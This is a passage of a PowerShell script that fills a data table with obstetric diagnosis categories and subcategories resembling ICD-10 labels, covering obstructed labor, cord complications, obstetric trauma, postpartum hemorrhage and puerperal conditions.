presentation","Obstructed labor due to face presentation, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to face presentation","Obstructed labor due to face presentation, fetus 1") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to face presentation","Obstructed labor due to face presentation, fetus 2") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to face presentation","Obstructed labor due to face presentation, fetus 3") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to face presentation","Obstructed labor due to face presentation, fetus 4") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to face presentation","Obstructed labor due to face presentation, fetus 5") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to face presentation","Obstructed labor due to face presentation, other fetus") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to brow presentation","Obstructed labor due to brow presentation, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to brow presentation","Obstructed labor due to brow presentation, fetus 1") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to brow presentation","Obstructed labor due to brow presentation, fetus 2") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to brow presentation","Obstructed labor due to brow presentation, fetus 3") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to brow presentation","Obstructed labor due to brow presentation, fetus 4") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to brow presentation","Obstructed labor due to brow presentation, fetus 5") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to brow presentation","Obstructed labor due to brow presentation, other fetus") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to shoulder presentation","Obstructed labor due to shoulder presentation, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to shoulder presentation","Obstructed labor due to shoulder presentation, fetus 1") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to shoulder presentation","Obstructed labor due to shoulder presentation, fetus 2") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to shoulder presentation","Obstructed labor due to shoulder presentation, fetus 3") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to shoulder presentation","Obstructed labor due to shoulder presentation, fetus 4") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to shoulder presentation","Obstructed labor due to shoulder presentation, fetus 5") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to shoulder presentation","Obstructed labor due to shoulder presentation, other fetus") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to compound presentation","Obstructed labor due to compound presentation, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to compound presentation","Obstructed labor due to compound presentation, fetus 1") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to compound presentation","Obstructed labor due to compound presentation, fetus 2") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to compound presentation","Obstructed labor due to compound presentation, fetus 3") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to compound presentation","Obstructed labor due to compound presentation, fetus 4") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to compound presentation","Obstructed labor due to compound presentation, fetus 5") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to compound presentation","Obstructed labor due to compound presentation, other fetus") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to other malposition and malpresentation","Obstructed labor due to other malposition and malpresentation, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to other malposition and malpresentation","Obstructed labor due to other malposition and malpresentation, fetus 1") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to other malposition and malpresentation","Obstructed labor due to other malposition and malpresentation, fetus 2") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to other malposition and malpresentation","Obstructed labor due to other malposition and malpresentation, fetus 3") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to other malposition and malpresentation","Obstructed labor due to other malposition and malpresentation, fetus 4") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to other malposition and malpresentation","Obstructed labor due to other malposition and malpresentation, fetus 5") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to other malposition and malpresentation","Obstructed labor due to other malposition and malpresentation, other fetus") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to malposition and malpresentation, unspecified","Obstructed labor due to malposition and malpresentation, unspecified, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to malposition and malpresentation, unspecified","Obstructed labor due to malposition and malpresentation, unspecified, fetus 1") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to malposition and malpresentation, unspecified","Obstructed labor due to malposition and malpresentation, unspecified, fetus 2") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to malposition and malpresentation, unspecified","Obstructed labor due to malposition and malpresentation, unspecified, fetus 3") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to malposition and malpresentation, unspecified","Obstructed labor due to malposition and malpresentation, unspecified, fetus 4") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to malposition and malpresentation, unspecified","Obstructed labor due to malposition and malpresentation, unspecified, fetus 5") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to malposition and malpresentation, unspecified","Obstructed labor due to malposition and malpresentation, unspecified, other fetus") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to maternal pelvic abnormality","Obstructed labor due to deformed pelvis") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to maternal pelvic abnormality","Obstructed labor due to generally contracted pelvis") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to maternal pelvic abnormality","Obstructed labor due to pelvic inlet contraction") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to maternal pelvic abnormality","Obstructed labor due to pelvic outlet and mid-cavity contraction") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to maternal pelvic abnormality","Obstructed labor due to fetopelvic disproportion, unspecified") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to maternal pelvic abnormality","Obstructed labor due to abnormality of maternal pelvic organs") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to maternal pelvic abnormality","Obstructed labor due to other maternal pelvic abnormalities") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to maternal pelvic abnormality","Obstructed labor due to maternal pelvic abnormality, unspecified") + $null = $DiagnosisList.Rows.Add("Other obstructed labor","Obstructed labor due to shoulder dystocia") + $null = $DiagnosisList.Rows.Add("Other obstructed labor","Obstructed labor due to locked twins") + $null = $DiagnosisList.Rows.Add("Other obstructed labor","Obstructed labor due to unusually large fetus") + $null = $DiagnosisList.Rows.Add("Other obstructed labor","Obstructed labor due to other abnormalities of fetus") + $null = $DiagnosisList.Rows.Add("Failed trial of labor","Failed trial of labor, unspecified") + $null = $DiagnosisList.Rows.Add("Failed trial of labor","Failed attempted vaginal birth after previous cesarean delivery") + $null = $DiagnosisList.Rows.Add("Attempted application of vacuum extractor and forceps","Attempted application of vacuum extractor and forceps") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to other multiple fetuses","Obstructed labor due to other multiple fetuses") + $null = $DiagnosisList.Rows.Add("Other specified obstructed labor","Other specified obstructed labor") + $null = $DiagnosisList.Rows.Add("Obstructed labor, unspecified","Obstructed labor, unspecified") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by intrapartum hemorrhage, not elsewhere classified","Intrapartum hemorrhage with coagulation defect") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by intrapartum hemorrhage, not elsewhere classified","Other intrapartum hemorrhage") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by intrapartum hemorrhage, not elsewhere classified","Intrapartum hemorrhage, unspecified") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by abnormality of fetal acid-base balance","Labor and delivery complicated by abnormality of fetal acid-base balance") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by prolapse of cord","Labor and delivery complicated by prolapse of cord, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by prolapse of cord","Labor and delivery complicated by prolapse of cord, fetus 1") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by prolapse of cord","Labor and delivery complicated by prolapse of cord, fetus 2") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by prolapse of cord","Labor and delivery complicated by prolapse of cord, fetus 3") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by prolapse of cord","Labor and delivery complicated by prolapse of cord, fetus 4") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by prolapse of cord","Labor and delivery complicated by prolapse of cord, fetus 5") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by prolapse of cord","Labor and delivery complicated by prolapse of cord, other fetus") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, with compression","Labor and delivery complicated by cord around neck, with compression, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, with compression","Labor and delivery complicated by cord around neck, with compression, fetus 1") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, with compression","Labor and delivery complicated by cord around neck, with compression, fetus 2") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, with compression","Labor and delivery complicated by cord around neck, with compression, fetus 3") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, with compression","Labor and delivery complicated by cord around neck, with compression, fetus 4") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, with compression","Labor and delivery complicated by cord around neck, with compression, fetus 5") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, with compression","Labor and delivery complicated by cord around neck, with compression, other fetus") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, with compression","Labor and delivery complicated by other cord entanglement, with compression, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, with compression","Labor and delivery complicated by other cord entanglement, with compression, fetus 1") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, with compression","Labor and delivery complicated by other cord entanglement, with compression, fetus 2") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, with compression","Labor and delivery complicated by other cord entanglement, with compression, fetus 3") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, with compression","Labor and delivery complicated by other cord entanglement, with compression, fetus 4") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, with compression","Labor and delivery complicated by other cord entanglement, with compression, fetus 5") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, with compression","Labor and delivery complicated by other cord entanglement, with compression, other fetus") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by short cord","Labor and delivery complicated by short cord, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by short cord","Labor and delivery complicated by short cord, fetus 1") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by short cord","Labor and delivery complicated by short cord, fetus 2") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by short cord","Labor and delivery complicated by short cord, fetus 3") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by short cord","Labor and delivery complicated by short cord, fetus 4") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by short cord","Labor and delivery complicated by short cord, fetus 5") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by short cord","Labor and delivery complicated by short cord, other fetus") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vasa previa","Labor and delivery complicated by vasa previa, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vasa previa","Labor and delivery complicated by vasa previa, fetus 1") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vasa previa","Labor and delivery complicated by vasa previa, fetus 2") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vasa previa","Labor and delivery complicated by vasa previa, fetus 3") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vasa previa","Labor and delivery complicated by vasa previa, fetus 4") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vasa previa","Labor and delivery complicated by vasa previa, fetus 5") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vasa previa","Labor and delivery complicated by vasa previa, other fetus") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vascular lesion of cord","Labor and delivery complicated by vascular lesion of cord, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vascular lesion of cord","Labor and delivery complicated by vascular lesion of cord, fetus 1") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vascular lesion of cord","Labor and delivery complicated by vascular lesion of cord, fetus 2") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vascular lesion of cord","Labor and delivery complicated by vascular lesion of cord, fetus 3") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vascular lesion of cord","Labor and delivery complicated by vascular lesion of cord, fetus 4") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vascular lesion of cord","Labor and delivery complicated by vascular lesion of cord, fetus 5") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by vascular lesion of cord","Labor and delivery complicated by vascular lesion of cord, other fetus") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, without compression","Labor and delivery complicated by cord around neck, without compression, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, without compression","Labor and delivery complicated by cord around neck, without compression, fetus 1") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, without compression","Labor and delivery complicated by cord around neck, without compression, fetus 2") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, without compression","Labor and delivery complicated by cord around neck, without compression, fetus 3") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, without compression","Labor and delivery complicated by cord around neck, without compression, fetus 4") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, without compression","Labor and delivery complicated by cord around neck, without compression, fetus 5") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord around neck, without compression","Labor and delivery complicated by cord around neck, without compression, other fetus") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, without compression","Labor and delivery complicated by other cord entanglement, without compression, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, without compression","Labor and delivery complicated by other cord entanglement, without compression, fetus 1") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, without compression","Labor and delivery complicated by other cord entanglement, without compression, fetus 2") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, without compression","Labor and delivery complicated by other cord entanglement, without compression, fetus 3") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, without compression","Labor and delivery complicated by other cord entanglement, without compression, fetus 4") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, without compression","Labor and delivery complicated by other cord entanglement, without compression, fetus 5") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord entanglement, without compression","Labor and delivery complicated by other cord entanglement, without compression, other fetus") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord complications","Labor and delivery complicated by other cord complications, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord complications","Labor and delivery complicated by other cord complications, fetus 1") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord complications","Labor and delivery complicated by other cord complications, fetus 2") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord complications","Labor and delivery complicated by other cord complications, fetus 3") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord complications","Labor and delivery complicated by other cord complications, fetus 4") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord complications","Labor and delivery complicated by other cord complications, fetus 5") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by other cord complications","Labor and delivery complicated by other cord complications, other fetus") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord complication, unspecified","Labor and delivery complicated by cord complication, unspecified, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord complication, unspecified","Labor and delivery complicated by cord complication, unspecified, fetus 1") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord complication, unspecified","Labor and delivery complicated by cord complication, unspecified, fetus 2") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord complication, unspecified","Labor and delivery complicated by cord complication, unspecified, fetus 3") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord complication, unspecified","Labor and delivery complicated by cord complication, unspecified, fetus 4") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord complication, unspecified","Labor and delivery complicated by cord complication, unspecified, fetus 5") + $null = $DiagnosisList.Rows.Add("Labor and delivery complicated by cord complication, unspecified","Labor and delivery complicated by cord complication, unspecified, other fetus") + $null = $DiagnosisList.Rows.Add("Perineal laceration during delivery","First degree perineal laceration during delivery") + $null = $DiagnosisList.Rows.Add("Perineal laceration during delivery","Second degree perineal laceration during delivery") + $null = $DiagnosisList.Rows.Add("Third degree perineal laceration during delivery","Third degree perineal laceration during delivery, unspecified") + $null = $DiagnosisList.Rows.Add("Third degree perineal laceration during delivery","Third degree perineal laceration during delivery, IIIa") + $null = $DiagnosisList.Rows.Add("Third degree perineal laceration during delivery","Third degree perineal laceration during delivery, IIIb") + $null = $DiagnosisList.Rows.Add("Third degree perineal laceration during delivery","Third degree perineal laceration during delivery, IIIc") + $null = $DiagnosisList.Rows.Add("Fourth degree perineal laceration during delivery","Fourth degree perineal laceration during delivery") + $null = $DiagnosisList.Rows.Add("Anal sphincter tear complicating delivery, not associated with third degree laceration","Anal sphincter tear complicating delivery, not associated with third degree laceration") + $null = $DiagnosisList.Rows.Add("Perineal laceration during delivery, unspecified","Perineal laceration during delivery, unspecified") + $null = $DiagnosisList.Rows.Add("Rupture of uterus (spontaneous) before onset of labor","Rupture of uterus before onset of labor, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Rupture of uterus (spontaneous) before onset of labor","Rupture of uterus before onset of labor, second trimester") + $null = $DiagnosisList.Rows.Add("Rupture of uterus (spontaneous) before onset of labor","Rupture of uterus before onset of labor, third trimester") + $null = $DiagnosisList.Rows.Add("Rupture of uterus during labor","Rupture of uterus during labor") + $null = $DiagnosisList.Rows.Add("Postpartum inversion of uterus","Postpartum inversion of uterus") + $null = $DiagnosisList.Rows.Add("Obstetric laceration of cervix","Obstetric laceration of cervix") + $null = $DiagnosisList.Rows.Add("Obstetric high vaginal laceration alone","Obstetric high vaginal laceration alone") + $null = $DiagnosisList.Rows.Add("Other obstetric injury to pelvic organs","Other obstetric injury to pelvic organs") + $null = $DiagnosisList.Rows.Add("Obstetric damage to pelvic joints and ligaments","Obstetric damage to pelvic joints and ligaments") + $null = $DiagnosisList.Rows.Add("Obstetric hematoma of pelvis","Obstetric hematoma of pelvis") + $null = $DiagnosisList.Rows.Add("Other specified obstetric trauma","Laceration of uterus, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specified obstetric trauma","Other specified trauma to perineum and vulva") + $null = $DiagnosisList.Rows.Add("Other specified obstetric trauma","Other specified obstetric trauma") + $null = $DiagnosisList.Rows.Add("Obstetric trauma, unspecified","Obstetric trauma, unspecified") + $null = $DiagnosisList.Rows.Add("Postpartum hemorrhage","Third-stage hemorrhage") + $null = $DiagnosisList.Rows.Add("Postpartum hemorrhage","Other immediate postpartum hemorrhage") + $null = $DiagnosisList.Rows.Add("Postpartum hemorrhage","Delayed and secondary postpartum hemorrhage") + $null = $DiagnosisList.Rows.Add("Postpartum hemorrhage","Postpartum coagulation defects") + $null = $DiagnosisList.Rows.Add("Retained placenta and membranes, without hemorrhage","Retained placenta without hemorrhage") + $null = $DiagnosisList.Rows.Add("Retained placenta and membranes, without hemorrhage","Retained portions of placenta and membranes, without hemorrhage") + $null = $DiagnosisList.Rows.Add("Complications of anesthesia during labor and delivery","Aspiration pneumonitis due to anesthesia during labor and delivery") + $null = $DiagnosisList.Rows.Add("Complications of anesthesia during labor and delivery","Other pulmonary complications of anesthesia during labor and delivery") + $null = $DiagnosisList.Rows.Add("Complications of anesthesia during labor and delivery","Cardiac complications of anesthesia during labor and delivery") + $null = $DiagnosisList.Rows.Add("Complications of anesthesia during labor and delivery","Central nervous system complications of anesthesia during labor and delivery") + $null = $DiagnosisList.Rows.Add("Complications of anesthesia during labor and delivery","Toxic reaction to local anesthesia during labor and delivery") + $null = $DiagnosisList.Rows.Add("Complications of anesthesia during labor and delivery","Spinal and epidural anesthesia-induced headache during labor and delivery") + $null = $DiagnosisList.Rows.Add("Complications of anesthesia during labor and delivery","Other complications of spinal and epidural anesthesia during labor and delivery") + $null = $DiagnosisList.Rows.Add("Complications of anesthesia during labor and delivery","Failed or difficult intubation for anesthesia during labor and delivery") + $null = $DiagnosisList.Rows.Add("Complications of anesthesia during labor and delivery","Other complications of anesthesia during labor and delivery") + $null = $DiagnosisList.Rows.Add("Complications of anesthesia during labor and delivery","Complication of anesthesia during labor and delivery, unspecified") + $null = $DiagnosisList.Rows.Add("Other complications of labor and delivery, not elsewhere classified","Maternal distress during labor and delivery") + $null = $DiagnosisList.Rows.Add("Other complications of labor and delivery, not elsewhere classified","Shock during or following labor and delivery") + $null = $DiagnosisList.Rows.Add("Other complications of labor and delivery, not elsewhere classified","Pyrexia during labor, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other complications of labor and delivery, not elsewhere classified","Other infection during labor") + $null = $DiagnosisList.Rows.Add("Other complications of labor and delivery, not elsewhere classified","Other complications of obstetric surgery and procedures") + $null = $DiagnosisList.Rows.Add("Other complications of labor and delivery, not elsewhere classified","Delayed delivery after artificial rupture of membranes") + $null = $DiagnosisList.Rows.Add("Other specified complications of labor and delivery","Maternal exhaustion complicating labor and delivery") + $null = $DiagnosisList.Rows.Add("Other specified complications of labor and delivery","Onset (spontaneous) of labor after 37 completed weeks of gestation but before 39 completed weeks gestation, with delivery by (planned) cesarean section") + $null = $DiagnosisList.Rows.Add("Other specified complications of labor and delivery","Other specified complications of labor and delivery") + $null = $DiagnosisList.Rows.Add("Complication of labor and delivery, unspecified","Complication of labor and delivery, unspecified") + $null = $DiagnosisList.Rows.Add("Abnormality in fetal heart rate and rhythm complicating labor and delivery","Abnormality in fetal heart rate and rhythm complicating labor and delivery") + $null = $DiagnosisList.Rows.Add("Other fetal stress complicating labor and delivery","Labor and delivery complicated by meconium in amniotic fluid") + $null = $DiagnosisList.Rows.Add("Other fetal stress complicating labor and delivery","Fetal stress in labor or delivery due to drug administration") + $null = $DiagnosisList.Rows.Add("Other fetal stress complicating labor and delivery","Labor and delivery complicated by other evidence of fetal stress") + $null = $DiagnosisList.Rows.Add("Other fetal stress complicating labor and delivery","Labor and delivery complicated by fetal stress, unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for full-term uncomplicated delivery","Encounter for full-term uncomplicated delivery") + $null = $DiagnosisList.Rows.Add("Encounter for cesarean delivery without indication","Encounter for cesarean delivery without indication") + $null = $DiagnosisList.Rows.Add("Puerperal sepsis","Puerperal sepsis") + $null = $DiagnosisList.Rows.Add("Other puerperal infections","Infection of obstetric surgical wound") + $null = $DiagnosisList.Rows.Add("Other infection of genital tract following delivery","Cervicitis following delivery") + $null = $DiagnosisList.Rows.Add("Other infection of genital tract following delivery","Endometritis following delivery") + $null = $DiagnosisList.Rows.Add("Other infection of genital tract following delivery","Vaginitis following delivery") + $null = $DiagnosisList.Rows.Add("Other infection of genital tract following delivery","Other infection of genital tract following delivery") + $null = $DiagnosisList.Rows.Add("Urinary tract infection following delivery","Urinary tract infection following delivery, unspecified") + $null = $DiagnosisList.Rows.Add("Urinary tract infection following delivery","Infection of kidney following delivery") + $null = $DiagnosisList.Rows.Add("Urinary tract infection following delivery","Infection of bladder following delivery") + $null = $DiagnosisList.Rows.Add("Urinary tract infection following delivery","Other urinary tract infection following delivery") + $null = $DiagnosisList.Rows.Add("Pyrexia of unknown origin following delivery","Pyrexia of unknown origin following delivery") + $null = $DiagnosisList.Rows.Add("Other specified puerperal infections","Puerperal septic thrombophlebitis") + $null = $DiagnosisList.Rows.Add("Other specified puerperal infections","Other specified puerperal infections") + $null = $DiagnosisList.Rows.Add("Venous complications and hemorrhoids in the puerperium","Superficial thrombophlebitis in the puerperium") + $null = $DiagnosisList.Rows.Add("Venous complications and hemorrhoids in the puerperium","Deep phlebothrombosis in the puerperium") + $null = $DiagnosisList.Rows.Add("Venous complications and hemorrhoids in the puerperium","Hemorrhoids in the puerperium") + $null = $DiagnosisList.Rows.Add("Venous complications and hemorrhoids in the puerperium","Cerebral venous thrombosis in the puerperium") + $null = $DiagnosisList.Rows.Add("Venous complications and hemorrhoids in the puerperium","Varicose veins of lower extremity in the puerperium") + $null = $DiagnosisList.Rows.Add("Venous complications and hemorrhoids in the puerperium","Other venous complications in the puerperium") + $null = $DiagnosisList.Rows.Add("Venous complications and hemorrhoids in the puerperium","Venous complication in the puerperium, unspecified") + $null = $DiagnosisList.Rows.Add("Obstetric air embolism in pregnancy","Air embolism in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Obstetric air embolism in pregnancy","Air embolism in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Obstetric air embolism in pregnancy","Air embolism in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Obstetric air embolism in pregnancy","Air embolism in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Air embolism in childbirth","Air embolism in childbirth") + $null = $DiagnosisList.Rows.Add("Air embolism in the puerperium","Air embolism in the puerperium") + $null = $DiagnosisList.Rows.Add("Amniotic fluid embolism in pregnancy","Amniotic fluid embolism in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Amniotic fluid embolism in pregnancy","Amniotic fluid embolism in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Amniotic fluid embolism in pregnancy","Amniotic fluid embolism in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Amniotic fluid embolism in pregnancy","Amniotic fluid embolism in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Amniotic fluid embolism in childbirth","Amniotic fluid embolism in childbirth") + $null = $DiagnosisList.Rows.Add("Amniotic fluid embolism in the puerperium","Amniotic fluid embolism in the puerperium") + $null = $DiagnosisList.Rows.Add("Thromboembolism in pregnancy","Thromboembolism in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Thromboembolism in pregnancy","Thromboembolism in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Thromboembolism in pregnancy","Thromboembolism in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Thromboembolism in pregnancy","Thromboembolism in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Thromboembolism in childbirth","Thromboembolism in childbirth") + $null = $DiagnosisList.Rows.Add("Thromboembolism in the puerperium","Thromboembolism in the puerperium") + $null = $DiagnosisList.Rows.Add("Pyemic and septic embolism in pregnancy","Pyemic and septic embolism in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Pyemic and septic embolism in pregnancy","Pyemic and septic embolism in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Pyemic and septic embolism in pregnancy","Pyemic and septic embolism in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Pyemic and septic embolism in pregnancy","Pyemic and septic embolism in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pyemic and septic embolism in childbirth","Pyemic and septic embolism in childbirth") + $null = $DiagnosisList.Rows.Add("Pyemic and septic embolism in the puerperium","Pyemic and septic embolism in the puerperium") + $null = $DiagnosisList.Rows.Add("Other embolism in pregnancy","Other embolism in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other embolism in pregnancy","Other embolism in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other embolism in pregnancy","Other embolism in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other embolism in pregnancy","Other embolism in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other embolism in childbirth","Other embolism in childbirth") + $null = $DiagnosisList.Rows.Add("Other embolism in the puerperium","Other embolism in the puerperium") + $null = $DiagnosisList.Rows.Add("Pulmonary complications of anesthesia during the puerperium","Aspiration pneumonitis due to anesthesia during the puerperium") + $null = $DiagnosisList.Rows.Add("Pulmonary complications of anesthesia during the puerperium","Other pulmonary complications of anesthesia during the puerperium") + $null = $DiagnosisList.Rows.Add("Cardiac complications of anesthesia during the puerperium","Cardiac complications of anesthesia during the puerperium") + $null = $DiagnosisList.Rows.Add("Central nervous system complications of anesthesia during the puerperium","Central nervous system complications of anesthesia during the puerperium") + $null = $DiagnosisList.Rows.Add("Toxic reaction to local anesthesia during the puerperium","Toxic reaction to local anesthesia during the puerperium") + $null = $DiagnosisList.Rows.Add("Spinal and epidural anesthesia-induced headache during the puerperium","Spinal and epidural anesthesia-induced headache during the puerperium") + $null = $DiagnosisList.Rows.Add("Other complications of spinal and epidural anesthesia during the puerperium","Other complications of spinal and epidural anesthesia during the puerperium") + $null = $DiagnosisList.Rows.Add("Failed or difficult intubation for anesthesia during the puerperium","Failed or difficult intubation for anesthesia during the puerperium") + $null = $DiagnosisList.Rows.Add("Other complications of anesthesia during the puerperium","Other complications of anesthesia during the puerperium") + $null = $DiagnosisList.Rows.Add("Complication of anesthesia during the puerperium, unspecified","Complication of anesthesia during the puerperium, unspecified") + $null = $DiagnosisList.Rows.Add("Complications of the puerperium, not elsewhere classified","Disruption of cesarean delivery wound") + $null = $DiagnosisList.Rows.Add("Complications of the puerperium, not elsewhere classified","Disruption of perineal obstetric wound") + $null = $DiagnosisList.Rows.Add("Complications of the puerperium, not elsewhere classified","Hematoma of obstetric wound") + $null = $DiagnosisList.Rows.Add("Complications of the puerperium, not elsewhere 